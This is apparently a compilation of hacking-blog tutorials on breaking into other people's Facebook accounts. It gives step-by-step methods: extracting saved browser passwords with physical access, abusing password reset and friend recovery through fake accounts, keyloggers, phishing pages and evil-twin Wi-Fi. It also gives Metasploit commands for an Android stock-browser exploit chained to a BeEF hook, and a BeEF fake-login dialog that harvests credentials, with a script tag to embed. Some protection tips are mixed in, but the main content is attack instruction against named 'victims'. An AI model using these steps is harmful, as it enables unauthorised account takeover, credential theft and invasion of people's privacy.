Password Extraction for facebook- With software for password extraction - Hack Like A Pro | Hacking Facebook (step by step within images)

Password Extraction for facebook-

WitH software for password extraction!

Welcome back, my novice hackers!

As we saw in my first tutorial on Facebook hacking, it is not a simple task. However, with the right skills and tools, as well as persistence and ingenuity, nothing is beyond our capabilities.

One of the cardinal rules of hacking is: "If I can get physical access to the computer... GAME OVER!" This means that if I were given even just a few moments to the machine itself, I can hack anything I want from that computer—including Facebook passwords.

I recognize that not all of you are technically savvy, though, that doesn't mean you can't be with some hard work. So this Facebook hack is for those of you without either the technical savvy or the work ethic to become so. All you need is a moment or two of unfettered physical access to the target's computer and you can easily have their Facebook password.

Remember Me?

This hack relies upon the fact that most of us want websites to remember us when we return. We don't want to put in our username and password every time we want to access the site, so we tell the browser to "Remember me." In that way, we don't need to re-authenticate and provide our password, our system simply remembers it and provides it to the website.

Of course, those passwords must be stored somewhere on our computer. The key is to know where those passwords are stored and how to crack the hashed passwords when we find them. For instance, Mozilla stores the users passwords at:

c:/Users/Username/AppData/Local/Mozilla/Firefox/Profiles/**.default/cache2/entries

As you can see in the screenshot below, I have displayed that directory and password hashes from a Windows 7 computer running Firefox 36. These are all the saved passwords from various websites that Firefox has stored.

Note that the location of these passwords is in different places for each browser and sometimes in different places on different operating systems with the same browser. Look for more on this subject in my Digital Forensics series in the near future.

Elcomsoft's Facebook Password Extraction Tool

Fortunately for us, there is a company in Russia named Elcomsoft.

This company employs first-rate cryptographers and they develop and sell software to crack various password encryption schemes. (As a side note, a cryptographer from Elcomsoft was the first person arrested and prosecuted under the DCMA when he came to the U.S. for a conference. He was eventually acquitted.)

Their software is listed as digital forensic tools, but they can just as easily be used for hacking purposes. One of their tools was used for the iCloud hack that revealed nude photos of Jennifer Lawrence and other Hollywood stars in August 2014.

Elcomsoft developed a Windows tool named Facebook Password Extractor (FPE, for short) that extracts the user's Facebook password from its location on the user's system (the user must have used the "Remember me" feature) and then cracks it. Of course, we need physical access to the system to do this in most cases. Alternatively, if we can hack their system, we could upload this tool to the target system and then use it or we could simply download the user's browser password file and use this tool locally on our system.

You can download this free tool from Elcomsoft's website, which officially supports the following web browsers (though it may work on newer versions).

• Microsoft Internet Explorer (up to IE9)

• Mozilla Firefox (up to Firefox 4)

• Apple Safari (up to Safari 5)

• Opera (up to Opera 11)

• Google Chrome (up to Chrome 11)

The process of using this tool is almost idiot-proof. (Almost a requirement for Facebook hacking, wouldn't you agree?) You simply install it on the system whose Facebook password you want to extract and it does everything else.

One of the drawbacks to using this tool is that Elcomsoft released it back in 2011 and it has not been updated since. Maybe we should make this a Python project for the Null Byte community in the near future?

Look for more on Facebook hacking and developing the skills and arts of a professional hacker here in the near future, my novice hackers!

Ways To Hack Facebook - Hack Like A Pro | Hacking Facebook

Ways to hack facebook-hacking

Despite the security concerns that have plagued Facebook for years, most people are sticking around and new members keep on joining. This has led Facebook to break records numbers with over 1.94 billion monthly active users, as of March 2017 — and around 1.28 billion daily active users.

We share our lives on Facebook. We share our birthdays and our anniversaries. We share our vacation plans and locations. We share the births of our sons and the deaths of our fathers. We share our most cherished moments and our most painful thoughts. We divulge every aspect of our lives. Clinical psychologists have written entire books detailing the surprisingly extensive impact Facebook has on our emotions and relationships.

But we sometimes forget who's watching.

We use Facebook as a tool to connect, but there are those people who use that connectivity for malicious purposes. We reveal what others can use against us. They know when we're not home and for how long we're gone. They know the answers to our security questions. People can practically steal our identities — and that's just with the visible information we purposely give away through our public Facebook profile.

Image via Digital Trends

The scariest part is that as we get more comfortable with advances in technology, we actually become more susceptible to hacking. As if we haven't already done enough to aid hackers in their quest for our data by sharing publicly, those in the know can get into our emails and Facebook accounts to steal every other part of our lives that we intended to keep away from prying eyes.

In fact, you don't even have to be a professional hacker to get into someone's Facebook account.

It can be as easy as running Firesheep on your computer for a few minutes. In fact, Facebook actually allows people to get into someone else's Facebook account without knowing their password. All you have to do is choose three friends to send a code to. You type in the three codes, and voilà — you're into the account. It's as easy as that.

In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you.

Method 1Reset the Password

The easiest way to "hack" into someone's Facebook is through resetting the password. This could be easier done by people who are friends with the person they're trying to hack.

• The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section. Still stuck? Hackers use scraping tools like TheHarvester to mine for email addresses, so check out our guide here to find a user's email that you don't already know.

• Next, click on Forgotten your password? and type in the victim's email. Their account should come up. Click This is my account.

• It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press No longer have access to these?

• It will now ask How can we reach you? Type in an email that you have that also isn't linked to any other Facebook account.

• It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.

• If you don't figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.

• It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.

How to Protect Yourself

• Use an email address specifically for your Facebook and don't put that email address on your profile.

• When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries — not even third grade teacher's names. It's as easy as looking through a yearbook.

• Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.

Method 2Use a Keylogger

Software Keylogger

A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.

Null Byte features an excellent guide on how to get a keylogger on a target computerto get you started. If this isn't what you're looking for, you can search for free keyloggers or try coding a basic keylogger yourself in C++.

Hardware Keylogger

These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it to your own computer and extracting the data.

There are several options available for hardware keyloggers. Wired keyloggers like the Keyllama can be attached to the victim's computer to save keystrokes and works on any operating system — provided you have physical access to retrieve the device later. If you're looking to swipe the passwords remotely, you can invest in a premium Wi-Fi enabled keylogger which can email captured keystrokes or be accessed remotely over Wi-Fi.

How to Protect Yourself

• Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.

• Install a password manager. Keyloggers can't steal what you don't type. Password mangers automatically fill out important forms without you having to type anything in.

• Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.

• Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.

Method 3Phishing

This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type of phishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.

The easiest way to do this would be to follow our guide on how to clone a websiteto make an exact copy of the facebook login page. Then you'll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it's still possible, especially if you clone the entire Facebook website.

How to Protect Yourself

• Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here's a great guide on what to look out for). If you're still doubtful, go directly to the main website and login the way you usually do.

• Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.

• Use anti-virus & web security software, like Norton or McAfee.

Method 4Man in the Middle Attack

If you can get close to your target, you can trick them into connecting to a fake Wi-Fi network to steal credentials via a Man In The Middle (MITM) attack. Tools like the Wi-Fi Pumpkin make creating a fake Wi-Fi network is as easy as sticking a $16 Wireless Network Adapter on the $35 Raspberry Pi and getting close to your target. Once the victim connects to your fake network, you can inspect the traffic or route them to fake login pages. You can even set it to only replace certain pages and leave other pages alone.

This little computer can create an evil AP - a cloned wireless network to trick the user into connecting so you can listen in on their traffic.Image by SADMIN/Null Byte

Get Hacking: How to Set Up Kali Linux on the Raspberry Pi

How to Protect Yourself

• Don't connect to any open (unencrypted) Wi-Fi Networks.

• Especially don't connect to any Wi-Fi networks that are out of place. Why might you see a "Google Starbucks" when there's no Starbucks for miles? Because hackers know your phone or computer will automatically connect to it if you have used a network with the same name before.

• If you have trouble connecting to your Wi-Fi, look at your list of nearby networks to see if there are any copies of your network name nearby.

• If your router asks you to enter the password for a firmware update to enable the internet or shows you a page with major spelling or grammar errors, it is likely you're connected to a fake hotspot and someone nearby is trying to steal your credentials.

A Couple More Facebook Hacks

For those with a bit more technical skill, check out the Same Origin Policy Facebook hack and the somewhat easier, Facebook Password Extractor. We will continue add more Facebook hacks in the near future, so keep coming back here.

How to Protect Yourself

• On Facebook, go to your Account Settings and check under Security. Make sure Secure Browsing is enabled. Firesheep can't sniff out cookies over encrypted connections like HTTPS, so try to steer away from HTTP.

• Full time SSL. Use Firefox add-ons such as HTTPS-Everywhere or Force-TLS.

• Log off a website when you're done. Firesheep can't stay logged in to your account if you log off.

• Use only trustworthy Wi-Fi networks. A hacker can be sitting across from you at Starbucks and looking through your email without you knowing it.

• Use a VPN. These protect against any sidejacking from the same WiFi network, no matter what website you're on as all your network traffic will be encrypted all the way to your VPN provider.

Protecting Yourself: Less Is More

Social networking websites are great ways to stay connected with old friends and meet new people. Creating an event, sending a birthday greeting and telling your parents you love them are all a couple of clicks away.

Facebook isn't something you need to steer away from, but you do need to be aware of your surroundings and make smart decisions about what you put up on your profile. The less information you give out on Facebook for everyone to see, the more difficult you make it for hackers.

If your Facebook account ever gets hacked, check out our guide on getting your hacked Facebook account back for information on restoring your account.

Bonus: If you're interested in who's checking you out, there are some ways you can (kindof) track who's viewed your Facebook profile.

More Password-Hacking Guides

For more info on cracking passwords, check out our guides on hacking Linux passwords, hacking Windows passwords, and our super-easy beginner's guide on hacking Wi-Fi passwords (or for newer wireless routers, how to crack WPA2-PSK wifi passwords).

Ways To Hack Facebook - Hack Like A Pro | @technicalsabuwala || Hacking Facebook - How to Hack Facebook, Part 1 (Same-Origin Policy)

How to Hack Facebook, Part 1 (Same-Origin Policy)

Welcome back, my budding hackers!

This is the initial post of a new series on how to hack Facebook. It's important to note here that each hack I'll be covering is very specific. I have said it before, but I feel I need to repeat it again: there is NO SILVER BULLET that works under all circumstances. Obviously, the good folks at Facebook have taken precautions to make certain that their app is not hacked, but if we are creative, persistent, and ingenious, we can still get in.

Facebook is one of the most secure applications on the Internet and, despite what you might read on the Internet, it is NOT easy to hack. In addition, most of those websites on the Internet willing to sell you a Facebook hack are scams. Don't give them a penny!

If you want to hack Facebook, you need to invest some time into learning. If you are new to hacking, you might want to start with my article "How to Use Null Byte to Study to Become a Professional Hacker."

In addition, I want to put in a word about what we mean by the word "hack." In some cases, we might get the password which, of course, will give us full access to the Facebook account. In other cases, we might just get access to the account without any rights. In still other schemes, we might get the cookies that Facebook places in the user's browser and then place it in our browser for access to the account whenever we please. In yet another scenario, we can place ourselves between the user and Facebook in a form of MitM attack, to get the password, etc.

In this first entry in this series, we will use a flaw in the stock Android web browser that will provide us with access to the Facebook account. I hope it goes without saying that this hack will only work when the user has accessed their Facebook account from the stock Android browser, not the Facebook mobile app. Although Google is aware of this security flaw in their browser, it is not automatically patched or replaced on existing systems. As a result, this hack will work on most Android systems.

Same Origin Policy

Same-origin policy (SOP) is one of the key security measures that every browser should meet. What it means is that browsers are designed so that webpages can't load code that is not part of their own resource. This prevents attackers from injecting code without the authorization of the website owner.

Unfortunately, the default Android browser can be hacked as it does not enforce the SOP policy adequately. In this way, an attacker can access the user's other pages that are open in the browser, among other things. This means that if we can get the user to navigate to our website and then send them some malicious code, we can then access other sites that are open in their browser, such as Facebook.

For those of you are new to Null Byte and hacking, I recommend that you start by installing Kali Linux. In this hack, we will need two tools, Metasploit and BeEF, both of which are built into our Kali Linux system.

Step 1Open Metasploit

Let's begin by firing up Kali and then opening Metasploit by typing:

kali > msfconsole

You should get a screen like this.

For those of you unfamiliar with Metasploit, check out my series on using Metasploit for more information on using it successfully.

Step 2Find the Exploit

Next, let's find the exploit for this hack by typing:

msf > search platform:android stock browser

When we do so, we get only one module:

auxiliary/gather/android_stock_browser_uxss

Let's load that module by typing:

msf > use auxiliary/gather/android_stock_browser_uxss

Step 3Get the Info

Now that we have loaded the module, let's get some information on this module. We can do this by typing:

msf > info

As you can see from this info page, this exploit works against all stock Android browsers before Android 4.4 KitKat. It tells us that this module allows us to run arbitrary JavaScript in the context of the URL.

Step 4Show Options

Next, let see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.

Step 5Open BeEF

Now, open BeEF. Please take a look at this tutorial on using BeEF, if you are are unfamiliar the tool.

Step 6Set JS to BeEF Hook

Back to Metasploit now. We need to set the REMOTE_JS to the hook on BeEF. Of course, make certain you use the IP of the server that BeEF is running on.

msf > set REMOTE_JS http://192.168.1.107:3000/hook.js

Next, we need to set the URIPATH to the root directory /. Let's type:

msf > set uripath /

Step 7Run the Server

Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.

msf > run

Step 8Navigate to the Website from an Android Browser

Now we are replicating the behavior of the victim. When they navigate to the website hosting the hook, it will automatically inject the JavaScript into their browser and hook it. So, we need to use the stock browser on an Android device and go to 192.168.1.107:8080, or whatever the IP is of your website.

Step 9Hook Browser

When the user/device visits our web server at 192.168.1.107, the BeEF JavaScript will hook their browser. It will show under the "Hooked Browser" explorer in BeEF. We now control their browser!

Step 10Detect if the Browser Is Authenticated to Facebook

Now let's go back to BeEF and go to the "Commands" tab. Under the "Network" folder we find the "Detect Social Networks" command. This command will check to see whether the victim is authenticated to Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower right.

When we do so, BeEF will return for us the results. As you can see below, BeEF returned to us that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.

Now, we need to simply wait until the user is authenticated to Facebook and attempt this command again. Once they have authenticated to Facebook, we can direct a tab to open the user's Facebook page, which we will do in our next Facebook hack tutorial.

How to Get Facebook Credentials Without Hacking Facebook - Hack Like A Pro | Hacking Facebook in just 5 mins

How to Get Facebook Credentials Without Hacking Facebook

Welcome back my, tenderfoot hackers!

Many people come to Null Byte looking to hack Facebook without the requisite skills to do so. Facebook is far from unhackable, but to do so, you will need some skills, and skill development is what Null Byte is all about.

Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That's what this tutorial is all about. If you don't take the time to install Kali and learn a little about networking and Linux, this won't work for you—but if you are willing to take a little time to study here at Null Byte, you can probably gain access to someone's Facebook credentials very easily with this little trick.

(All Facebook users should take note of this if you don't want to get hacked.)

Step 1Install Kali (If You Haven't Done So Already)

The first step is to download and install Kali Linux. This can be done as a standalone operating system, a dual-boot with your Windows or Mac system, or in a virtual machine inside the operating system of your choice. No, this cannot be done with Windows! Windows, for all its strengths and ease of use, is not an appropriate hacking operating system.

Within Kali, there is an app called the Browser Exploitation Framework (BeEF). It is capable of helping you hack the victim's browser and take control of it. Once you have control of their browser, there are so many things you can do. One of them is to trick the user into giving away their Facebook credentials, which I'll show you here.

Step 2Open BeEF

Fire up Kali, and you should be greeted with a screen like below. You start up BeEF by clicking on the cow icon to the left of the Kali desktop.

When you click on it, it starts BeEF by opening a terminal.

BeEF is an application that runs in the background on a web server on your system that you access from a browser. Once BeEF is up and running, open your IceWeasel browser to access its interface. You can login to BeEF by using the username beefand the password beef.

You will then by greeted by BeEF's "Getting Started" screen.

Step 3Hook the Victim's Browser

This is the most critical—maybe even the most difficult part—of this hack. You must get the victim to click on a specially designed JavaScript link to "hook" their browser. This can be done in innumerable ways.

The simplest way is to simply embed the code into your website and entice the user to click on it. This might be done by such text as "Click here for more information" or "Click here to see the video." Use your imagination.

The script looks something like below. Embed it into a webpage, and when someone clicks on it, you own their browser! (Comment below if you have any questions on this; You might also use the MitMf to send the code to the user, but this requires more skill.)

<script src= "http://192.168.1.101:3000/hook.js&#8221 ; type= "text/javascript" ></script>

From here, I will be assuming you have "hooked" the victim's browser and are ready to own it.

Step 4Send a Dialog Box to the User

When you have hooked the victim's browser, its IP address, along with the operating system and browser type icons, will appear in the "Hooked Browsers" panel on the left. Here, I have simply used my own browser to demonstrate.

If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the 'Commands" tab.

Click on the "Commands" tab, then scroll down the "Modules Tree" until you come to "Social Engineering" and click to expand it. It will display numerous social engineering modules. Click on "Pretty Theft," which will open a "Module Results History" and "Pretty Theft" window.

This module enables you to send a pop-up window in the user's browser. In our case, we will be using the Facebook dialog box.

If we click on the "Dialog Type" box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the "Execute" button the the bottom.

Step 5The Dialog Box Appears on the Target System

When you click "Execute" in BeEF, a dialog box will appear in the victim's browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.

Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.

Step 6Harvest the Credentials

Back on our system in the BeEf interface, we can see that the credentials appear in the "Command results" window. The victim has entered their email address "loveofmylife@gmail.com" and their password "sweetbippy" and they have been captured and presented to you in BeEF.

If you are really determined to get those Facebook credentials, it can be most definitely be done, and this is just one way of many methods (but probably the simplest).

If you you want to develop the skills to an even higher level, start studying here at Null Byte to master the most valuable skill set of the 21st century—hacking!